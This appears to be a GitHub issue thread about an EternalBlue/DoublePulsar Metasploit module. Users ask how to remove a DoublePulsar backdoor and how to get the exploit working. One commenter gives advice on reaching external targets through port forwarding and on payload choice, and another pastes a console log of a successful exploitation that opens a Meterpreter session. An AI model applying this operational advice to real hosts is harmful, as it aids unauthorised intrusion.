Open zeldp opened 6 years ago
I'm having the same issue... how do you resolve this?
I'm also having the same issue..
So.... how to fix it?
It this problem resolved ?
reboot the target host. Since it resides in memory, just rebooting the machine should be enough to clear out your previous backdoor
you all should know that this ruby script can not exploit an external target using its lan ip because the payload on target will connect to the ip configured on you lhost witch is the lan ip . You should use a modem to run this plugin , this way you will get an ISP dhcp release witch is not the range of lan ips , basically is a direct external ip 212.xxx.xxx.xxx instead 192.168.xxx.xxx . In alternative a port forward should be setup on your router to forward all wan packets to your linux lan ip .
And try to not using the bind_tcp payload
Hi,
Can anyone please let me know how can I remove the backdoor that has been installed. I used eternal blue double pulsar exploit and payload windows/x64/meterpreter/bind_tcp. Process inject - lsass.exe Target Architecture - x64 DOUBLEPULSARPATH /root/Eternalblue-Doublepulsar-Metasploit/deps/ ETERNALBLUEPATH /root/Eternalblue-Doublepulsar-Metasploit/deps/
[] Started bind handler [] x.x.x.x:445 - Generating Eternalblue XML data [] x.x.x.x:445 - Generating Doublepulsar XML data [] x.x.x.x:445 - Generating payload DLL for Doublepulsar [] x.x.x.x:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll [] x.x.x.x:445 - Launching Eternalblue... 000f:err:service:process_send_command receiving command result timed out [+] x.x.x.x:445 - Backdoor is already installed [] x.x.x.x:445 - Launching Doublepulsar... 000f:err:service:process_send_command receiving command result timed out [] Sending stage (206403 bytes) to 10.136.8.13 [*] Meterpreter session 2 opened (x.x.x.x:44911 -> x.x.x.x.13:4444) at 2018-07-13 12:35:02 -0400 0015:err:service:process_send_command receiving command result timed out 002b:err:plugplay:handle_bus_relations Failed to load driver L"WineHID" [+] x.x.x.x:445 - Remote code executed... 3... 2... 1...
Thank you.